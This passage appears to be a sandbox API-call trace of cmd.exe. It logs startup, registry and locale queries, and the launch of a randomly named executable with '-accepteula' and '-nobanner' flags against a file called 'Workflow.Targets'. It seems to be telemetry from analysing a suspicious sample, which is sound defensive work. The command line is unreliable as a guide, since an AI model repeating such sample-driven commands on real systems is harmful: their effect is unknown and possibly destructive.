(normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 955 os_tid = 0x394 [0290.342] GetModuleHandleA (lpModuleName=0x0) returned 0x13d0000 [0290.342] __set_app_type (_Type=0x1) [0290.342] __p__fmode () returned 0x77984d6c [0290.342] __p__commode () returned 0x77985b1c [0290.342] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x13e36e0) returned 0x0 [0290.342] __getmainargs (in: _Argc=0x13f50e8, _Argv=0x13f50ec, _Env=0x13f50f0, _DoWildCard=0, _StartInfo=0x13f50fc | out: _Argc=0x13f50e8, _Argv=0x13f50ec, _Env=0x13f50f0) returned 0 [0290.343] GetCurrentThreadId () returned 0x394 [0290.343] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x394) returned 0x84 [0290.343] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75130000 [0290.343] GetProcAddress (hModule=0x75130000, lpProcName="SetThreadUILanguage") returned 0x75172780 [0290.343] SetThreadUILanguage (LangId=0x0) returned 0x409 [0290.384] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0290.384] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0xbafe5c | out: phkResult=0xbafe5c*=0x0) returned 0x2 [0290.384] VirtualQuery (in: lpAddress=0xbafe63, lpBuffer=0xbafe14, dwLength=0x1c | out: lpBuffer=0xbafe14*(BaseAddress=0xbaf000, AllocationBase=0xab0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0290.384] VirtualQuery (in: lpAddress=0xab0000, lpBuffer=0xbafe14, dwLength=0x1c | out: lpBuffer=0xbafe14*(BaseAddress=0xab0000, AllocationBase=0xab0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0290.384] VirtualQuery (in: lpAddress=0xab1000, lpBuffer=0xbafe14, dwLength=0x1c | out: lpBuffer=0xbafe14*(BaseAddress=0xab1000, AllocationBase=0xab0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0290.384] VirtualQuery (in: lpAddress=0xab3000, lpBuffer=0xbafe14, dwLength=0x1c | out: lpBuffer=0xbafe14*(BaseAddress=0xab3000, AllocationBase=0xab0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0290.384] VirtualQuery (in: lpAddress=0xbb0000, lpBuffer=0xbafe14, dwLength=0x1c | out: lpBuffer=0xbafe14*(BaseAddress=0xbb0000, AllocationBase=0xbb0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0290.384] GetConsoleOutputCP () returned 0x1b5 [0290.610] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0290.611] SetConsoleCtrlHandler (HandlerRoutine=0x13ef980, Add=1) returned 1 [0290.611] _get_osfhandle (_FileHandle=1) returned 0xc0 [0290.611] SetConsoleMode (hConsoleHandle=0xc0, dwMode=0x0) returned 0 [0290.611] _get_osfhandle (_FileHandle=1) returned 0xc0 [0290.611] GetConsoleMode (in: hConsoleHandle=0xc0, lpMode=0x13fe40c | out: lpMode=0x13fe40c) returned 0 [0290.611] _get_osfhandle (_FileHandle=0) returned 0x38 [0290.611] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x13fe408 | out: lpMode=0x13fe408) returned 1 [0290.640] GetEnvironmentStringsW () returned 0xc18070* [0290.640] FreeEnvironmentStringsA (penv="=") returned 1 [0290.640] GetEnvironmentStringsW () returned 0xc18070* [0290.640] FreeEnvironmentStringsA (penv="=") returned 1 [0290.640] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0xbaedc0 | out: phkResult=0xbaedc0*=0x94) returned 0x0 [0290.640] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0xbaedc4, lpData=0xbaedcc, lpcbData=0xbaedc8*=0x1000 | out: lpType=0xbaedc4*=0x0, lpData=0xbaedcc*=0x8, lpcbData=0xbaedc8*=0x1000) returned 0x2 [0290.640] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0xbaedc4, lpData=0xbaedcc, lpcbData=0xbaedc8*=0x1000 | out: lpType=0xbaedc4*=0x4, lpData=0xbaedcc*=0x1, lpcbData=0xbaedc8*=0x4) returned 0x0 [0290.640] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0xbaedc4, lpData=0xbaedcc, lpcbData=0xbaedc8*=0x1000 | out: lpType=0xbaedc4*=0x0, lpData=0xbaedcc*=0x1, lpcbData=0xbaedc8*=0x1000) returned 0x2 [0290.640] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0xbaedc4, lpData=0xbaedcc, lpcbData=0xbaedc8*=0x1000 | out: lpType=0xbaedc4*=0x4, lpData=0xbaedcc*=0x0, lpcbData=0xbaedc8*=0x4) returned 0x0 [0290.640] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0xbaedc4, lpData=0xbaedcc, lpcbData=0xbaedc8*=0x1000 | out: lpType=0xbaedc4*=0x4, lpData=0xbaedcc*=0x40, lpcbData=0xbaedc8*=0x4) returned 0x0 [0290.640] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0xbaedc4, lpData=0xbaedcc, lpcbData=0xbaedc8*=0x1000 | out: lpType=0xbaedc4*=0x4, lpData=0xbaedcc*=0x40, lpcbData=0xbaedc8*=0x4) returned 0x0 [0290.641] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0xbaedc4, lpData=0xbaedcc, lpcbData=0xbaedc8*=0x1000 | out: lpType=0xbaedc4*=0x0, lpData=0xbaedcc*=0x40, lpcbData=0xbaedc8*=0x1000) returned 0x2 [0290.641] RegCloseKey (hKey=0x94) returned 0x0 [0290.641] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0xbaedc0 | out: phkResult=0xbaedc0*=0x94) returned 0x0 [0290.641] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0xbaedc4, lpData=0xbaedcc, lpcbData=0xbaedc8*=0x1000 | out: lpType=0xbaedc4*=0x0, lpData=0xbaedcc*=0x40, lpcbData=0xbaedc8*=0x1000) returned 0x2 [0290.641] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0xbaedc4, lpData=0xbaedcc, lpcbData=0xbaedc8*=0x1000 | out: lpType=0xbaedc4*=0x4, lpData=0xbaedcc*=0x1, lpcbData=0xbaedc8*=0x4) returned 0x0 [0290.641] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0xbaedc4, lpData=0xbaedcc, lpcbData=0xbaedc8*=0x1000 | out: lpType=0xbaedc4*=0x0, lpData=0xbaedcc*=0x1, lpcbData=0xbaedc8*=0x1000) returned 0x2 [0290.641] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0xbaedc4, lpData=0xbaedcc, lpcbData=0xbaedc8*=0x1000 | out: lpType=0xbaedc4*=0x4, lpData=0xbaedcc*=0x0, lpcbData=0xbaedc8*=0x4) returned 0x0 [0290.641] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0xbaedc4, lpData=0xbaedcc, lpcbData=0xbaedc8*=0x1000 | out: lpType=0xbaedc4*=0x4, lpData=0xbaedcc*=0x9, lpcbData=0xbaedc8*=0x4) returned 0x0 [0290.641] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0xbaedc4, lpData=0xbaedcc, lpcbData=0xbaedc8*=0x1000 | out: lpType=0xbaedc4*=0x4, lpData=0xbaedcc*=0x9, lpcbData=0xbaedc8*=0x4) returned 0x0 [0290.641] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0xbaedc4, lpData=0xbaedcc, lpcbData=0xbaedc8*=0x1000 | out: lpType=0xbaedc4*=0x0, lpData=0xbaedcc*=0x9, lpcbData=0xbaedc8*=0x1000) returned 0x2 [0290.641] RegCloseKey (hKey=0x94) returned 0x0 [0290.641] time (in: timer=0x0 | out: timer=0x0) returned 0x5bb432ab [0290.641] srand (_Seed=0x5bb432ab) [0290.641] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c vIDhS3md.exe -accepteula \"Workflow.Targets\" -nobanner" [0290.641] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c vIDhS3md.exe -accepteula \"Workflow.Targets\" -nobanner" [0290.641] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0290.641] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xc18078, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0290.641] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0290.641] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0290.641] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0290.641] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0290.641] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0290.642] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0290.642] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0290.642] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0290.642] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0290.642] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0290.642] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0290.642] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0290.642] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0290.642] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xbafb98 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0290.642] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", nBufferLength=0x104, lpBuffer=0xbafb98, lpFilePart=0xbafb90 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0xbafb90*="Desktop") returned 0x1d [0290.642] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0290.642] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xbaf918 | out: lpFindFileData=0xbaf918) returned 0xc17468 [0290.642] FindClose (in: hFindFile=0xc17468 | out: hFindFile=0xc17468) returned 1 [0290.642] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0xbaf918 | out: lpFindFileData=0xbaf918) returned 0xc17468 [0290.642] FindClose (in: hFindFile=0xc17468 | out: hFindFile=0xc17468) returned 1 [0290.642] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0290.642] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0xbaf918 | out: lpFindFileData=0xbaf918) returned 0xc17468 [0290.642] FindClose (in: hFindFile=0xc17468 | out: hFindFile=0xc17468) returned 1 [0290.642] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0290.643] SetCurrentDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 1 [0290.643] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 1 [0290.643] GetEnvironmentStringsW () returned 0xc1a1d0* [0290.643] FreeEnvironmentStringsA (penv="=") returned 1 [0290.643] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0290.643] GetConsoleOutputCP () returned 0x1b5 [0290.656] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0290.656] GetUserDefaultLCID () returned 0x409 [0290.656] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x14024a0, cchData=8 | out: lpLCData=":") returned 2 [0290.656] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0xbafcc8, cchData=128 | out: lpLCData="0") returned 2 [0290.656] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0xbafcc8, cchData=128 | out: lpLCData="0") returned 2 [0290.656] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0xbafcc8, cchData=128 | out: lpLCData="1") returned 2 [0290.656] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x14024b0, cchData=8 | out: lpLCData="/") returned 2 [0290.656] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x1402500, cchData=32 | out: lpLCData="Mon") returned 4 [0290.656] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x1402540, cchData=32 | out: lpLCData="Tue") returned 4 [0290.656] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x1402580, cchData=32 | out: lpLCData="Wed") returned 4 [0290.656] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x14025c0, cchData=32 | out: lpLCData="Thu") returned 4 [0290.656] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x1402600, cchData=32 | out: lpLCData="Fri") returned 4 [0290.657] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x1402640, cchData=32 | out: lpLCData="Sat") returned 4 [0290.657] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x1402680, cchData=32 | out: lpLCData="Sun") returned 4 [0290.657] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x14024c0, cchData=8 | out: lpLCData=".") returned 2 [0290.657] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x14024e0, cchData=8 | out: lpLCData=",") returned 2 [0290.657] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0290.657] GetConsoleTitleW (in: lpConsoleTitle=0xc18da8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0290.713] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75130000 [0290.714] GetProcAddress (hModule=0x75130000, lpProcName="CopyFileExW") returned 0x7514fa80 [0290.714] GetProcAddress (hModule=0x75130000, lpProcName="IsDebuggerPresent") returned 0x7514a790 [0290.714] GetProcAddress (hModule=0x75130000, lpProcName="SetConsoleInputExeNameW") returned 0x74e435c0 [0290.715] _wcsicmp (_String1="vIDhS3md.exe", _String2=")") returned 77 [0290.715] _wcsicmp (_String1="FOR", _String2="vIDhS3md.exe") returned -16 [0290.715] _wcsicmp (_String1="FOR/?", _String2="vIDhS3md.exe") returned -16 [0290.715] _wcsicmp (_String1="IF", _String2="vIDhS3md.exe") returned -13 [0290.715] _wcsicmp (_String1="IF/?", _String2="vIDhS3md.exe") returned -13 [0290.715] _wcsicmp (_String1="REM", _String2="vIDhS3md.exe") returned -4 [0290.715] _wcsicmp (_String1="REM/?", _String2="vIDhS3md.exe") returned -4 [0290.717] GetConsoleTitleW (in: lpConsoleTitle=0xbaf9b0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0290.719] GetFileAttributesW (lpFileName="vIDhS3md.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vidhs3md.exe")) returned 0x20 [0290.719] _wcsicmp (_String1="vIDhS3md.exe", _String2="DIR") returned 18 [0290.719] _wcsicmp (_String1="vIDhS3md.exe", _String2="ERASE") returned 17 [0290.719] _wcsicmp (_String1="vIDhS3md.exe", _String2="DEL") returned 18 [0290.719] _wcsicmp (_String1="vIDhS3md.exe", _String2="TYPE") returned 2 [0290.719] _wcsicmp (_String1="vIDhS3md.exe", _String2="COPY") returned 19 [0290.719] _wcsicmp (_String1="vIDhS3md.exe", _String2="CD") returned 19 [0290.719] _wcsicmp (_String1="vIDhS3md.exe", _String2="CHDIR") returned 19 [0290.719] _wcsicmp (_String1="vIDhS3md.exe", _String2="RENAME") returned 4 [0290.719] _wcsicmp (_String1="vIDhS3md.exe", _String2="REN") returned 4 [0290.719] _wcsicmp (_String1="vIDhS3md.exe", _String2="ECHO") returned 17 [0290.719] _wcsicmp (_String1="vIDhS3md.exe", _String2="SET") returned 3 [0290.719] _wcsicmp (_String1="vIDhS3md.exe", _String2="PAUSE") returned 6 [0290.719] _wcsicmp (_String1="vIDhS3md.exe", _String2="DATE") returned 18 [0290.720] _wcsicmp (_String1="vIDhS3md.exe", _String2="TIME") returned 2 [0290.720] _wcsicmp (_String1="vIDhS3md.exe", _String2="PROMPT") returned 6 [0290.720] _wcsicmp (_String1="vIDhS3md.exe", _String2="MD") returned 9 [0290.720] _wcsicmp (_String1="vIDhS3md.exe", _String2="MKDIR") returned 9 [0290.720] _wcsicmp (_String1="vIDhS3md.exe", _String2="RD") returned 4 [0290.720] _wcsicmp (_String1="vIDhS3md.exe", _String2="RMDIR") returned 4 [0290.720] _wcsicmp (_String1="vIDhS3md.exe", _String2="PATH") returned 6 [0290.720] _wcsicmp (_String1="vIDhS3md.exe", _String2="GOTO") returned 15 [0290.720] _wcsicmp (_String1="vIDhS3md.exe", _String2="SHIFT") returned 3 [0290.720] _wcsicmp (_String1="vIDhS3md.exe", _String2="CLS") returned 19 [0290.720] _wcsicmp (_String1="vIDhS3md.exe", _String2="CALL") returned 19 [0290.720] _wcsicmp (_String1="vIDhS3md.exe", _String2="VERIFY") returned 4 [0290.720] _wcsicmp (_String1="vIDhS3md.exe", _String2="VER") returned 4 [0290.720] _wcsicmp (_String1="vIDhS3md.exe", _String2="VOL") returned -6 [0290.720] _wcsicmp (_String1="vIDhS3md.exe", _String2="EXIT") returned 17 [0290.720] _wcsicmp (_String1="vIDhS3md.exe", _String2="SETLOCAL") returned 3 [0290.720] _wcsicmp (_String1="vIDhS3md.exe", _String2="ENDLOCAL") returned 17 [0290.720] _wcsicmp (_String1="vIDhS3md.exe", _String2="TITLE") returned 2 [0290.720] _wcsicmp (_String1="vIDhS3md.exe", _String2="START") returned 3 [0290.720] _wcsicmp (_String1="vIDhS3md.exe", _String2="DPATH") returned 18 [0290.720] _wcsicmp (_String1="vIDhS3md.exe", _String2="KEYS") returned 11 [0290.720] _wcsicmp (_String1="vIDhS3md.exe", _String2="MOVE") returned 9 [0290.720] _wcsicmp (_String1="vIDhS3md.exe", _String2="PUSHD") returned 6 [0290.720] _wcsicmp (_String1="vIDhS3md.exe", _String2="POPD") returned 6 [0290.720] _wcsicmp (_String1="vIDhS3md.exe", _String2="ASSOC") returned 21 [0290.720] _wcsicmp (_String1="vIDhS3md.exe", _String2="FTYPE") returned 16 [0290.720] _wcsicmp (_String1="vIDhS3md.exe", _String2="BREAK") returned 20 [0290.720] _wcsicmp (_String1="vIDhS3md.exe", _String2="COLOR") returned 19 [0290.720] _wcsicmp (_String1="vIDhS3md.exe", _String2="MKLINK") returned 9 [0290.720] _wcsicmp (_String1="vIDhS3md.exe", _String2="DIR") returned 18 [0290.720] _wcsicmp (_String1="vIDhS3md.exe", _String2="ERASE") returned 17 [0290.720] _wcsicmp (_String1="vIDhS3md.exe", _String2="DEL") returned 18 [0290.720] _wcsicmp (_String1="vIDhS3md.exe", _String2="TYPE") returned 2 [0290.720] _wcsicmp (_String1="vIDhS3md.exe", _String2="COPY") returned 19 [0290.720] _wcsicmp (_String1="vIDhS3md.exe", _String2="CD") returned 19 [0290.720] _wcsicmp (_String1="vIDhS3md.exe", _String2="CHDIR") returned 19 [0290.720] _wcsicmp (_String1="vIDhS3md.exe", _String2="RENAME") returned 4 [0290.720] _wcsicmp (_String1="vIDhS3md.exe", _String2="REN") returned 4 [0290.720] _wcsicmp (_String1="vIDhS3md.exe", _String2="ECHO") returned 17 [0290.720] _wcsicmp (_String1="vIDhS3md.exe", _String2="SET") returned 3 [0290.720] _wcsicmp (_String1="vIDhS3md.exe", _String2="PAUSE") returned 6 [0290.720] _wcsicmp (_String1="vIDhS3md.exe", _String2="DATE") returned 18 [0290.720] _wcsicmp (_String1="vIDhS3md.exe", _String2="TIME") returned 2 [0290.720] _wcsicmp (_String1="vIDhS3md.exe", _String2="PROMPT") returned 6 [0290.720] _wcsicmp (_String1="vIDhS3md.exe", _String2="MD") returned 9 [0290.720] _wcsicmp (_String1="vIDhS3md.exe", _String2="MKDIR") returned 9 [0290.720] _wcsicmp (_String1="vIDhS3md.exe", _String2="RD") returned 4 [0290.720] _wcsicmp (_String1="vIDhS3md.exe", _String2="RMDIR") returned 4 [0290.721] _wcsicmp (_String1="vIDhS3md.exe", _String2="PATH") returned 6 [0290.721] _wcsicmp (_String1="vIDhS3md.exe", _String2="GOTO") returned 15 [0290.721] _wcsicmp (_String1="vIDhS3md.exe", _String2="SHIFT") returned 3 [0290.721] _wcsicmp (_String1="vIDhS3md.exe", _String2="CLS") returned 19 [0290.721] _wcsicmp (_String1="vIDhS3md.exe", _String2="CALL") returned 19 [0290.721] _wcsicmp (_String1="vIDhS3md.exe", _String2="VERIFY") returned 4 [0290.721] _wcsicmp (_String1="vIDhS3md.exe", _String2="VER") returned 4 [0290.721] _wcsicmp (_String1="vIDhS3md.exe", _String2="VOL") returned -6 [0290.721] _wcsicmp (_String1="vIDhS3md.exe", _String2="EXIT") returned 17 [0290.721] _wcsicmp (_String1="vIDhS3md.exe", _String2="SETLOCAL") returned 3 [0290.721] _wcsicmp (_String1="vIDhS3md.exe", _String2="ENDLOCAL") returned 17 [0290.721] _wcsicmp (_String1="vIDhS3md.exe", _String2="TITLE") returned 2 [0290.721] _wcsicmp (_String1="vIDhS3md.exe", _String2="START") returned 3 [0290.721] _wcsicmp (_String1="vIDhS3md.exe", _String2="DPATH") returned 18 [0290.721] _wcsicmp (_String1="vIDhS3md.exe", _String2="KEYS") returned 11 [0290.721] _wcsicmp (_String1="vIDhS3md.exe", _String2="MOVE") returned 9 [0290.721] _wcsicmp (_String1="vIDhS3md.exe", _String2="PUSHD") returned 6 [0290.721] _wcsicmp (_String1="vIDhS3md.exe", _String2="POPD") returned 6 [0290.721] _wcsicmp (_String1="vIDhS3md.exe", _String2="ASSOC") returned 21 [0290.721] _wcsicmp (_String1="vIDhS3md.exe", _String2="FTYPE") returned 16 [0290.721] _wcsicmp (_String1="vIDhS3md.exe", _String2="BREAK") returned 20 [0290.721] _wcsicmp (_String1="vIDhS3md.exe", _String2="COLOR") returned 19 [0290.721] _wcsicmp (_String1="vIDhS3md.exe", _String2="MKLINK") returned 9 [0290.721] _wcsicmp (_String1="vIDhS3md.exe", _String2="FOR") returned 16 [0290.721] _wcsicmp (_String1="vIDhS3md.exe", _String2="IF") returned 13 [0290.721] _wcsicmp (_String1="vIDhS3md.exe", _String2="REM") returned 4 [0290.721] _wcsnicmp (_String1="vIDh", _String2="cmd ", _MaxCount=0x4) returned 19 [0290.722] SetErrorMode (uMode=0x0) returned 0x0 [0290.722] SetErrorMode (uMode=0x1) returned 0x0 [0290.722] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xc19278, lpFilePart=0xbaf4bc | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0xbaf4bc*="Desktop") returned 0x1d [0290.722] SetErrorMode (uMode=0x0) returned 0x1 [0290.722] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0290.722] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0290.726] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0290.727] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0290.727] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vIDhS3md.exe", fInfoLevelId=0x1, lpFindFileData=0xbaf268, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xbaf268) returned 0xc194b8 [0290.727] FindClose (in: hFindFile=0xc194b8 | out: hFindFile=0xc194b8) returned 1 [0290.727] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0290.727] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0290.727] GetConsoleTitleW (in: lpConsoleTitle=0xbaf73c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0290.727] InitializeProcThreadAttributeList (in: lpAttributeList=0xbaf668, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xbaf64c | out: lpAttributeList=0xbaf668, lpSize=0xbaf64c) returned 1 [0290.727] UpdateProcThreadAttribute (in: lpAttributeList=0xbaf668, dwFlags=0x0, Attribute=0x60001, lpValue=0xbaf654, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xbaf668, lpPreviousValue=0x0) returned 1 [0290.727] GetStartupInfoW (in: lpStartupInfo=0xbaf6a0 | out: lpStartupInfo=0xbaf6a0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x38, hStdOutput=0xc0, hStdError=0x40)) [0290.727] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0290.727] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0290.727] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0290.727] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0290.727] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0290.727] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0290.727] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0290.727] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0290.727] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0290.727] _wcsnicmp (_String1="COPYCMD", _String2="FN=\"Wor", _MaxCount=0x7) returned -3 [0290.728] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0290.728] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0290.728] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0290.728] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0290.728] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0290.728] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0290.728] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0290.728] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0290.728] 